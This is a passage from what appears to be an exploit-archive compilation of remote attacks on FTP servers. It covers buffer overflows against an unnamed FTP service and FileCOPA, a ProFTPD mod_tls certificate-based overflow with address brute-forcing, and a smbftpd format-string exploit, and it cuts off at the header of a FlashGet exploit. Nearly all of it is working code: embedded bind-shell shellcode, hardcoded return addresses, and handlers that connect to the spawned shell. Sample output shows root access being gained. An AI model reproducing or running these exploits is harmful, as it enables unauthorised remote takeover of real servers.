shellcode += "\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x38\x 46\x33\x4b\x38"
shellcode += "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x 46\x58\x42\x4c"
shellcode += "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x 44\x4c\x4b\x4e"
shellcode += "\x46\x4f\x4b\x43\x46\x35\x46\x32\x4a\x52\x45\x47\x 45\x4e\x4b\x58"
shellcode += "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x58\x 4e\x30\x4b\x34"
shellcode += "\x4b\x38\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x30\x 4e\x42\x4b\x48"
shellcode += "\x49\x38\x4e\x46\x46\x52\x4e\x31\x41\x36\x43\x4c\x 41\x43\x4b\x4d"
shellcode += "\x46\x36\x4b\x48\x43\x34\x42\x53\x4b\x48\x42\x44\x 4e\x50\x4b\x58"
shellcode += "\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x 50\x55\x4a\x56"
shellcode += "\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x 48\x4d\x48\x36"
shellcode += "\x43\x35\x48\x36\x4a\x36\x43\x43\x44\x43\x4a\x36\x 47\x37\x43\x57"
shellcode += "\x44\x53\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x 4b\x4c\x4d\x4e"
shellcode += "\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x 49\x48\x45\x4e"
shellcode += "\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x55\x 4c\x56\x44\x30"
shellcode += "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x50\x45\x4f\x 4d\x4a\x47\x55"
shellcode += "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x45\x43\x35\x 43\x35\x43\x44"
shellcode += "\x43\x55\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x46\x 4a\x56\x41\x31"
shellcode += "\x4e\x45\x48\x36\x43\x55\x49\x58\x41\x4e\x45\x39\x 4a\x56\x46\x4a"
shellcode += "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x 4c\x46\x42\x31"
shellcode += "\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x 4d\x4a\x50\x42"
shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x45\x45\x35\x 4f\x4f\x42\x4d"
shellcode += "\x4a\x46\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x45\x 4f\x4f\x48\x4d"
shellcode += "\x42\x35\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x 43\x59\x4a\x56"
shellcode += "\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x 48\x4d\x45\x55"
shellcode += "\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x46\x48\x46\x 4a\x36\x43\x46"
shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x46\x42\x35\x49\x35\x 49\x32\x4e\x4c"
shellcode += "\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x38\x44\x4e\x 41\x53\x42\x4c"
shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x 44\x44\x4e\x32"
shellcode += "\x43\x59\x4d\x38\x4c\x57\x4a\x33\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x46"
shellcode += "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x 46\x34\x4f\x4f"
shellcode += "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x 41\x55\x4c\x36"
shellcode += "\x41\x30\x41\x35\x41\x45\x45\x45\x41\x45\x4f\x4f\x 42\x4d\x4a\x46"
shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x 48\x4d\x4c\x46"
shellcode += "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x 47\x55\x4e\x4f"
shellcode += "\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x45\x 4f\x4f\x42\x4d"
shellcode += "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x36\x43\x55\x 4f\x4f\x48\x4d"
shellcode += "\x4f\x4f\x42\x4d\x5a"
def ConnectRemoteShell(target):
connect = "/usr/bin/telnet " + target + " 4444"
os.system(connect)
def ExploitFTP(target):
sockAddr = (target, 21)
tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tsock.connect(sockAddr)
response = tsock.recv(1024)
print response
# At the time of overflow EBX points into our shellcode
payload = 'A' * 2553
# NOP's pad with a 15 byte jump over some junk and the RET address
# Jumps into our shellcode
payload += '\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f'
# Address of 'call ebx' from kernel32.dll SP4
payload += struct.pack('<L', 0x7C577B03)
# Address of pop reg/pop reg/ret for XP SP2 from ws2_32.dll
# But this one is not very reliable like Win2K SP4
#payload += struct.pack('<L', 0x71AB1269)
payload += '\x90' * 83
payload += shellcode
user = 'USER anonymous\r\n'
tsock.send(user)
response = tsock.recv(1024)
print response
passwd = 'PASS \x2c' + payload + '\r\n'
tsock.send(passwd)
response = tsock.recv(1024)
print response
if __name__ == '__main__':
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s <target>' % sys.argv[0]
sys.exit(-1)
ExploitFTP(target)
# [2007-03-26]
21 FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit (2)
# ================================================== ===========================================
# FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit(2)
# By Umesh Wanve
# ================================================== ===========================================
#
# Date : 05-04-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
#
# We can write some assembly instruction to jump into shellcode. At the time of EIP overwrite, ECX points to our
# hole request(LIST evil). So jumping forward into ECX points to our Shellcode. This was written coz i was learning
# ruby
#
# P.S. This was written for educational purpose. Use it at your own risk.Author will be not be
# responsible for any damage.
#
# Always Thanks to Metasploit and Stroke
#================================================= ==============================================
require 'net/ftp'
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
shellcode = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xf7"
shellcode += "\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x 1f\x7b\x07\x7f"
shellcode += "\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x 8f\x83\x17\x0b"
shellcode += "\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x 19\xb3\x38\x19"
shellcode += "\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\x cc\xd6\xdc\xa8"
shellcode += "\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\x a8\x9e\xf9\x6b"
shellcode += "\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x 7c\xc1\xc8\x0b"
shellcode += "\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\x b9\x8c\x14\xd0"
shellcode += "\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\x a8\xd6\x07\x50"
shellcode += "\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x 76\x6f\xf0\x82"
shellcode += "\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x 21\xd1\xab\xd3"
shellcode += "\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x 91\xd1\x71\x61"
shellcode += "\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\x a2\x7d\x28\xe8"
shellcode += "\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x 12\xcb\x7e\xc9"
shellcode += "\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x 8e\x44\x81\xd7"
shellcode += "\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x 7e\x67\x92\xd0"
shellcode += "\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x 5d\x7c\xba\xad"
shellcode += "\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x 09\x31\xee\x7f"
shellcode += "\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\x a6\xd3\xad\xd1"
shellcode += "\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x 08\xb5\x07\x50"
shellcode += "\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x 07\x08\xfc\xdf"
shellcode += "\xa4\x7d\x2e\x7f\x27\x82\xf8\x80"
host="10.217.100.130" #Target address
pad ="A" * 160 # Buffer
eip = "\x63\x37\x57\x7c" #jmp esp from KERNEL32.DLL on Win2000 SP4 English
nop ="\x90" * 12 # Nop Sled
nop1="\x90" * 4
asm ="\x33\xc0\xb0\x10\xc1\xe0\x04\x03\xc8\xff\xe1"
# 33 c0 xor eax, eax
# b0 10 mov al, 10
# c1 e0 04 shl eax,4
# 03 c8 add ecx,eax
# ff e1 jmp ecx
buffer ="A\x20" + pad + eip + nop1 + asm + nop + shellcode +"\r\n" # Our Evil Buffer
ftp = Net::FTP.new(host)
puts "++ Connecting to target...\n"
ftp.login(user="test", passwd="test") # User name and password
ftp.passive = true
sleep(2)
puts "++ Logging in....\n"
sleep(2)
puts "++ Building Malicious Request ....\n"
begin
ftp.list(buffer)
rescue Net::FTPError
$stderr.print "++ Done ...\n"
end
puts "++ Connecting to target on port 4444....\n"
command= "telnet "+ host +" 4444"
system(command)
ftp.close
# [2007-04-06]
21 ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit
/*
* *** Anti-modTLS-0day version 2 ***
*
* ProFTPd *.*.* + mod_tls remote-root-0day-exploit
*
* main advantages of this exploit:
* 1) No patched mod_tls versions yet
* 2) This is a preauthentication bug
* 3) Bruteforcing option (eheheheee)
* main disadvantages:
* 2) Target mechanism isn't very well, cause exploitation
* depends on library mapped address, so, there are no
* strict categories.
* 1) Dunno, if there are a lot of proftpd+mod_tls boxes
* outta there.
*
* Bug found by: netris
* exploit written by: netris
*
* -- ADD --
*
* Hi there. Here goes the original exploit written in 2004
* (not in 2006 like some of you would guess), and found by
* netris, not Evgeny Legerov. Big middle fingers to those
* who fight for commercial security shit system.
* Greets to arpunk, pandzilla, c0dak, mcb, c0de, ^sq, disque,
* gamma, djang0 and many others of ex #phenoelit channel.
*
* netris.
*
* mailto: [email protected]
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <getopt.h>
#include <netdb.h>
#include <openssl/ssl.h>
#include <openssl/ssl3.h>
#include <openssl/x509.h>
#include <openssl/err.h>
#define CODE_SZ 2322
#define DPORT 21
#define BSET(u,a,b,c,d) u = a*0x1000000;\
u+= b*0x0010000;\
u+= c*0x0000100;\
u+= d*0x0000001;
#define checkz(a) int i;\
for(i=0;i<4;i++){\
if(a[i]<0x20)a[i]=0x20;\
if(a[i]>0x7f)a[i]=0x7f;\
}
int ch,timeout=2,br=0;
struct ADDR{
char *os;
unsigned long call_reg; /* eax or edx */
};
/*bindshell, port 36864, offset 265, buf address is edx */
char shellcode[]="h22ImX522ImHRWPPSRPPaVUWWTBfRJfhdEfXf5YDfPDfh0PDTY 09RUajWY"
"0Loa0toafhoXfYf1LocjxY0Loe0Toe0ToffhH0fYf1Loh0tojj FY0Lok0t"
"ok0tolfht9fXf1Don0TopjyX0Dor0TosjKX0Dou0Tov0ToxjIX 0Doy0Toy"
"G0tozGGfhsCfYf1LozGG0tozGGjZY0LozGGjkX0Doz0TozGGjG X0Doz0To"
"zG0tozGGjAY0LozGf1tozGGG0tozGGjpY0LozG0tozGGjpY0Lo zG0TozGG"
"jfX0DozG0tozGGjRX0DozG0tozGG0TozGj8Y0Loz0tozG0TozG fhlGfYf1"
"LozGGGG0TozGG0TozGj3Y0Loz0tozG0tozGGjuX0DozG0TozGG jyY0LozG"
"0tozGGG0tozGj4Y0Loz0tozG0TozGjqX0Doz0tozG0tozGfhyC fXf1DozG"
"Gf1tozGGjFY0Loz0TozG0TozGjQY0LozGG0tozGj9Y0Loz0Toz G0TozGjY"
"X0DozGG0tozGjFX0Doz0TozG0tozGGjnY0LozG0TozGGjTY0Lo zG0tozGj"
"gY0Loz0TozG0tozGGj4Y0LozG0TozGj9X0DozG0tozGfhKofYf 1Lozf1to"
"zGG0tozGfha5fXf1Dozf1TozGGj4X0Doz0TozGjYY0LozGGGGj HY0LozCn"
"1qGvFXpvzvFxyvFqrNCOf26C9FcSwFR1T1jvFYOofvFfrNdvNj rNZOf2Gv"
"2KCCOf2LvVyvViOfC2KyMOFj629OnA2FOfA29wVivvXxkrK8O2 24xra54v"
"bingsh";
X509 *Create_Death_Certificate(EVP_PKEY **pkey);
void set_subject(X509 *cert, X509_NAME *subject, X509_NAME *issuer);
void DUF_add_entry(X509_NAME **subiss, char *field,
unsigned char *bytes, int len);
void setaddr(char *hname, struct sockaddr_in *sap, int port);
void senddata(int sock, char *data);
int shell(char *host,int port, struct sockaddr_in ad);
void help(char *prname);
SSL_CTX *ctx;
SSL *conn;
int sk;
void handler(){
if(!conn->in_handshake){
SSL_shutdown(conn);
SSL_free(conn);
}
close(sk);
exit(0);
}
void step(char *str, int err){
static i;
if(br)
return;
switch(err){
case 0:
fprintf(stderr,"[%03d] %s\n",i+1,str);
i++;break;
case -1:
fprintf(stderr,"[!!!] %s\n",str);
break;
case 1:
fprintf(stderr,"[!!!] %s\n\t",str);
ERR_print_errors_fp(stderr);
}
}
/* Add targets here */
struct ADDR vict[]={
{"Bruteforce mode",0x40202020},
{"Gentoo Linux 1.4 3.2.3-r1 - openssl-0.9.7d",0x40235727},
{"Gentoo Linux 1.4.3.2.3-r1 - default install",0x40283a43},
{0}
};
int main(int argc, char *argv[])
{
int port=DPORT,aa[4];
char *host,*sport,opt;
unsigned long saddr=0;
struct sockaddr_in a;
EVP_PKEY *key;
X509 *cert=NULL;
fprintf(stderr,"--< rebel-proftpd-modtls-0day\n");
fprintf(stderr,"--< netris @ duffsrebelz\n\n");
while((opt=getopt(argc,(void*)argv,"+b:t:x"))!=-1)
switch(opt){
case 't':timeout=atoi(optarg);break;
case 'b':sscanf(optarg,"0x%x",&saddr);break;
case 'x':ch=1;
X509_print_fp(stderr,
Create_Death_Certificate(&key));
exit(0);
default:help(argv[0]);
}
if(argc-optind!=2)
help(argv[0]);
ch=atoi(argv[optind]);
if(host=strchr(argv[optind+1],':')){
if(!isdigit(*(host+1))){
step("weird arguments\n",-1);
exit(-1);
}
host = strtok(argv[optind+1],":");
sport = strtok(NULL,":");
port=atoi(sport);
}else
host=argv[optind+1];
(ch==0)?(br=1):(br=0);
SSL_library_init();
if(br)
fprintf(stderr,
"--< Ready, Steady, GO!!! >:O\n\n");
setaddr(host,&a,port);
if(!saddr)saddr=vict[0].call_reg;
aa[3] = (saddr >> 0) & 0xff;
aa[2] = (saddr >> 8) & 0xff;
aa[1] = (saddr >> 16) & 0xff;
aa[0] = (saddr >> 24) & 0xff;
checkz(aa);
for(;;){
for(;aa[1]<0x7e;aa[1]++){
for(;aa[2]<0x7e;aa[2]++){
for(;aa[3]<0x7e;aa[3]++){
BSET(vict[0].call_reg,aa[0],aa[1],aa[2],aa[3]);
fprintf(stderr,"[0x%08x]\n",vict[0].call_reg);
sk = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
cert = Create_Death_Certificate(&key);
a.sin_port=htons(port);
a.sin_family=AF_INET;
if((connect(sk,(struct sockaddr*)&a,sizeof(a)))<0){
fprintf(stderr,"[!!!] couldn't connect\n\n");
close(sk);
exit(-1);
}
senddata(sk,"AUTH TLS\n");
ctx = SSL_CTX_new(SSLv23_client_method());
SSL_CTX_use_certificate(ctx, cert);
SSL_CTX_use_PrivateKey(ctx, key);
conn = SSL_new(ctx);
SSL_set_connect_state(conn);
SSL_set_fd(conn,sk);
signal(SIGINT,handler);
step("establishing SSL connection",0);
#ifdef DEBUG
getc(stdin);
#endif
if(SSL_connect(conn)<0){
fprintf(stderr,"[!!!] No SSL enabled on %s\n\n",host);
exit(-1);
}
step("shell spawn...",0);
if(shell(host,36864,a))
exit(0);
step("done, see ya later\n",0);
X509_free(cert);
if(!conn->in_handshake){
SSL_shutdown(conn);
SSL_free(conn);
}
}aa[3]=0x20;
}aa[2]=0x20;
}aa[1]=0x20;
}
return 0;
}
X509 *Create_Death_Certificate(EVP_PKEY **key)
{
FILE *fd;
time_t t;
X509_NAME *subject=NULL;
X509_NAME *issuer=NULL;
ASN1_TIME *tbefore,*tafter;
ASN1_INTEGER *serial;
X509 *dz; /* certificate */
RSA *rsa;
EVP_PKEY *pk;
step("preparing dirty certificate",0);
dz = X509_new();
/* private-key generation */
pk = EVP_PKEY_new();
rsa = RSA_generate_key(1024, RSA_F4, NULL,NULL);
EVP_PKEY_assign_RSA(pk,rsa);
X509_set_pubkey(dz,pk);
/* version/serial */
X509_set_version(dz,0x2); /* version: 3 */
serial = ASN1_INTEGER_new();
ASN1_INTEGER_set(serial,0x01);
X509_set_serialNumber(dz, serial);
/* not-before/notafter validity */
tbefore = ASN1_TIME_new();
tafter = ASN1_TIME_new();
ASN1_TIME_set(tbefore,t=0);
ASN1_TIME_set(tafter,t=60*60*24*366*65);
X509_set_notBefore(dz, tbefore);
X509_set_notAfter(dz, tafter);
/* DN Subject/Issuer */
set_subject(dz,subject,issuer);
/* let's make it self signed */
X509_sign(dz, pk, EVP_md5());
*key=pk;
X509_NAME_free(subject);
ASN1_INTEGER_free(serial);
ASN1_TIME_free(tbefore);
ASN1_TIME_free(tafter);
close(fd);
return dz;
}
/* <soletario> yeah man */
void set_subject(X509 *cert, X509_NAME *subject, X509_NAME *issuer)
{
int i;
char dc0de[6000];
memset(dc0de,0,sizeof(dc0de));
for(i=0; i<5000-1; i++)
dc0de[i]='E';
for(i=258; i<258+sizeof(shellcode)-1; i++)
dc0de[i]=shellcode[i-258];
i+=1;
for(; i<3200; i+=4){ /* uhh, rude */
dc0de[i+0]=(vict[ch].call_reg >> 0) & 0xff;
dc0de[i+1]=(vict[ch].call_reg >> 8) & 0xff;
dc0de[i+2]=(vict[ch].call_reg >>16) & 0xff;
dc0de[i+3]=(vict[ch].call_reg >>24) & 0xff;
}
subject = X509_get_subject_name(cert);
issuer = X509_get_issuer_name(cert);
DUF_add_entry(&subject,"host",dc0de,-1);
X509_set_subject_name(cert,subject);
X509_NAME_delete_entry(issuer,0);
X509_set_issuer_name(cert,issuer);
}
/* This function can insert large fields */
void DUF_add_entry(X509_NAME **subiss, char *field,
unsigned char *bytes, int len)
{
ASN1_OBJECT *obj;
X509_NAME_ENTRY *ne;
ne=X509_NAME_ENTRY_new();
obj=OBJ_txt2obj(field,0);
X509_NAME_ENTRY_set_object(ne,obj);
ASN1_mbstring_ncopy(&ne->value,bytes,len,MBSTRING_ASC,0,0,0);
X509_NAME_add_entry(*subiss,ne,-1,0);
}
void setaddr(char *hname, struct sockaddr_in *sap, int port)
{
struct hostent *hp;
memset(sap,0,sizeof(*sap));
sap->sin_family = AF_INET;
if(!inet_aton(hname,&sap->sin_addr)){
hp = gethostbyname(hname);
if(hp == NULL){
step("unkown host",-1);
return;
}
sap->sin_addr = *(struct in_addr *)hp->h_addr;
}else
sap->sin_addr.s_addr = inet_addr(hname);
sap->sin_port = htons(port);
}
int shell(char *host, int port, struct sockaddr_in ad)
{
u_char buf[4096];
fd_set fds;
int sock;
struct sockaddr_in a=ad;
sock = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
a.sin_family = AF_INET;
a.sin_port = htons(port);
if((connect(sock,(struct sockaddr*)&a,sizeof(a)))<0){
step("couldn't connect\n",-1);
close(sock);
if(!br)
handler();
else return 0;
}
signal(SIGINT,SIG_IGN);
fprintf(stderr,"\n--< %s just has been 0wned\n\n",host);
for (;;){
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
fprintf(stderr,"\033[31m[duffshell]#\033[0m ");
select(255, &fds, NULL, NULL, NULL);
memset(buf, 0, sizeof(buf));
if (FD_ISSET(sock, &fds)){
read(sock, buf, sizeof(buf));
fprintf(stderr, "%s", buf);
}
if (FD_ISSET(0, &fds)){
read(0, buf, sizeof(buf));
if(strstr(buf,"exit")){
fprintf(stderr,"\n");
return 1;
}
write(sock, buf, strlen(buf));
}
}
}
void senddata(int sock, char *data)
{
int i,c=0,j;
char au[4];
fd_set ff;
struct timeval tm;
int r;
FD_ZERO(&ff);
FD_SET(sock,&ff);
tm.tv_sec = timeout;
tm.tv_usec = 30;
memset(au,0,4);
if(data){
j=0;
send(sock,data,strlen(data),0);
for(;;){
if(!(r=select(sock+1,&ff,NULL,NULL,&tm)))
break;
if((i=read(sock,&c,1))<=0)
break;
}
}
}
void help(char *prname)
{
int i=0;
fprintf(stderr,"usage: %s target hostname:[port]\n",prname);
fprintf(stderr," -t <delay> :delay of data send/recv\n");
fprintf(stderr," -b <addr> :bruteforce starting address\n");
fprintf(stderr," -x :just the payload certificate and exit\n");
fprintf(stderr,"current targets:\n");
for(i=0;vict[i].call_reg;i++)
fprintf(stderr," %d) %s ( %08x )\n",i,
vict[i].os,
vict[i].call_reg);
putc('\n',stderr);
exit(-1);
}
// [2007-08-24]
21 smbftpd 0.96 SMBDirList-function Remote Format String Exploit
/*
* smbftpd 0.96 Proof of concept
* tested with smbftpd 0.96 compiled with gcc 3.3.6
*
* 1. write jumpcode to `BSS`
* mov dx, 0x1234
* pop eax
* cmp ax, dx
* jne $-4
* jmp esp
* 2. overwrite a GOT entry with the addr to `BSS` & send shellcode
*
* jerry:~> ./bleh -h localhost
* [+] GOT: 0x80591d8 - .bss (jmpcode): 0x805a791
* [+] localhost:21 (user: anonymous pass: )
* [+] PASV
* [+] writing jumpcode
* [+] PASV
* [+] overwriting GOT entry and sending shellcode
* jerry:~> nc localhost 4444
* id
* uid=0(root) gid=0(root) euid=1002(ftp) egid=1002(ftp) groups=1002(ftp)
*
*
* - Jerry Illikainen <[email protected]>
*
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <unistd.h>
#include <stdlib.h>
#define GOT 0x080591d8 // GOT entry for chdir
#define BSS 0x0805a791 // this is where the jumpcode will be written
#define DEBUG(d) if (debug) d;
#define MAXPATH 255
#define BUFSIZE 512
unsigned int debug = 0;
/* bindshell (port 4444) from metasploit.com
* restricted chars = 0x00 0x0a 0x0d */
unsigned char shellcode[] =
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xa3"
"\xef\xd7\xdb\x83\xeb\xfc\xe2\xf4\x92\x34\x84\x98\x f0\x85\xd5\xb1"
"\xc5\xb7\x4e\x52\x42\x22\x57\x4d\xe0\xbd\xb1\xb3\x b2\xb3\xb1\x88"
"\x2a\x0e\xbd\xbd\xfb\xbf\x86\x8d\x2a\x0e\x1a\x5b\x 13\x89\x06\x38"
"\x6e\x6f\x85\x89\xf5\xac\x5e\x3a\x13\x89\x1a\x5b\x 30\x85\xd5\x82"
"\x13\xd0\x1a\x5b\xea\x96\x2e\x6b\xa8\xbd\xbf\xf4\x 8c\x9c\xbf\xb3"
"\x8c\x8d\xbe\xb5\x2a\x0c\x85\x88\x2a\x0e\x1a\x5b";
void usage (char *arg)
{
printf("%s [options]\n"
"\t -h <host>\n"
"\t -p <port>\n"
"\t -u <usernmae - default anonymous>\n"
"\t -P <password - default none>\n\n", arg);
exit(1);
}
int sock (int port, char *host)
{
struct hostent *h;
struct sockaddr_in addr;
int s;
if ((h = gethostbyname(host)) == NULL)
{
perror("[!] gethostbyname");
exit(1);
}
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("[!] socket");
exit(1);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr = *((struct in_addr *)h->h_addr);
memset(addr.sin_zero, '\0', sizeof addr.sin_zero);
if (connect(s, (struct sockaddr *)&addr, sizeof(struct sockaddr)) == -1)
{
perror("[!] connect");
exit(1);
}
return s;
}
char *s_send (int s, char *m, char *fmt, ...)
{
static char buf[BUFSIZE];
char str[BUFSIZE];
ssize_t nb;
va_list ap;
va_start(ap, fmt);
vsnprintf(str, BUFSIZE-1, fmt, ap);
va_end(ap);
if (send(s, str, strlen(str), 0) == -1)
{
perror("[!] send");
exit(1);
}
DEBUG(printf("send: %s\n", str));
for (;;)
{
nb = recv(s, buf, BUFSIZE-1, 0);
buf[nb-1] = '\0';
if (m == NULL)
return buf;
else if (strstr(buf, m) != NULL)
return buf;
}
}
void fmt (int *jmpaddr, int *jmpc, int got, char mkd[][MAXPATH])
{
unsigned char a[4], b[4];
char *dir = mkd[0];
unsigned int i, offset = 1052, start = 256, base = 4;
int *pa = (int *)jmpaddr[0], *pb = (int *)jmpc[0];
for (i = 0; i <= 4; i++)
{
a[0] = (int)pa >> 24;
a[1] = ((int)pa & 0xff0000) >> 16;
a[2] = ((int)pa & 0xff00) >> 8;
a[3] = (int)pa & 0xff;
b[0] = (int)pb >> 24;
b[1] = ((int)pb & 0xff0000) >> 16;
b[2] = ((int)pb & 0xff00) >> 8;
b[3] = (int)pb & 0xff;
snprintf(dir, MAXPATH-1,
"%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
"%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
a[3], a[2], a[1], a[0],
a[3] + 1, a[2], a[1], a[0],
a[3] + 2, a[2], a[1], a[0],
a[3] + 3, a[2], a[1], a[0],
b[3] - 12 + start - (base + 4 - (base%4)), offset,
b[2] - b[3] + start, offset + 1,
b[1] - b[2] + start, offset + 2,
b[0] - b[1] + start, offset + 3);
dir = mkd[i];
if (i < 3)
{
pa = (int *)jmpaddr[i];
pb = (int *)jmpc[i];
} else {
pa = (int *)got;
pb = (int *)jmpaddr[0];
}
}
}
int main (int argc, char **argv)
{
int s[2], c, port = 21, pasv[5];
unsigned int i;
char *host = NULL, *user = "anonymous", *pass = "", *tmp, *p;
char mkd[5][MAXPATH], sc[2048];
int
got = GOT,
jmpaddr[] = { BSS, BSS+4, BSS+8 },
jmpc[] = {
0x1234ba66, // mov dx, 0x1234 - 66 ba 34 12
0xc2396658, // pop eax - 58
0xe4fffa75 // cmp ax,dx - 66 39 c2
// jne $-4 - 75 fa
// jmp esp - ff e4
};
while ((c = getopt(argc, argv, "h:p:u:P:?")) != -1)
{
switch (c)
{
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'u':
user = optarg;
break;
case 'P':
pass = optarg;
break;
case '?':
default:
usage(argv[0]);
break;
}
}
if (host == NULL)
usage(argv[0]);
printf("[+] GOT: %p - .bss (jmpcode): %p\n", (void *)got, (void *)jmpaddr[0]);
fmt(jmpaddr, jmpc, got, mkd);
printf("[+] %s:%d (user: %s pass: %s)\n", host, port, user, pass);
s[0] = sock(port, host);
s_send(s[0], "331", "USER %s\n", user);
p = s_send(s[0], NULL, "PASS %s\n", pass);
if (strstr(p, "230") == NULL)
{
printf("[!] login failed\n");
exit(1);
}
p = s_send(s[0], NULL, "MKD %s\nMKD %s\nMKD %s\n", mkd[0], mkd[1], mkd[2]);
if (strstr(p, "257") == NULL)
{
printf("[!] couldn't make directories\n");
exit(1);
}
printf("[+] PASV\n");
p = s_send(s[0], "227", "PASV\n");
if (strtok(p, ",") == NULL)
exit(1);
for (i = 0; i < 5; i++)
{
if ((tmp = strtok(NULL, ",")) == NULL)
{
printf("[!] aborting\n");
exit(1);
}
pasv[i] = atoi(tmp);
}
s[1] = sock(pasv[3]*256+pasv[4], host);
printf("[+] writing jumpcode\n");
s_send(s[0], NULL, "NLST -R\n");
s_send(s[0], NULL, "RMD %s\nRMD %s\nRMD %s\n", mkd[0], mkd[1], mkd[2]);
close(s[1]);
s_send(s[0], NULL, "MKD %s\n", mkd[3]);
printf("[+] PASV\n");
p = s_send(s[0], "227", "PASV\n");
if (strtok(p, ",") == NULL)
exit(1);
for (i = 0; i < 5; i++)
{
if ((tmp = strtok(NULL, ",")) == NULL)
{
printf("[!] aborting\n");
exit(1);
}
pasv[i] = atoi(tmp);
}
s[1] = sock(pasv[3]*256+pasv[4], host);
memset(sc, 0x90, sizeof(sc)); // some nops before and
memcpy(sc+3, "\x34\x12", 2); // after the "mark"
memcpy(sc+12, shellcode, sizeof(sc)-12);
printf("[+] overwriting GOT entry and sending shellcode\n\n");
s_send(s[0], NULL, "NLST -R%s\n", sc);
return 0;
}
// [2007-10-01]
21 FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
#!/usr/bin/perl
# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
# Coded By SkOd, skod.uk at gmail dot com
# Tested over Windows XP sp1 Hebrew
# link your victim to - ftp://localhost/somefile.TORRENT - over internet explorer.
##
# PoC by Krystian Kloskowski (h07) <[email protected]>
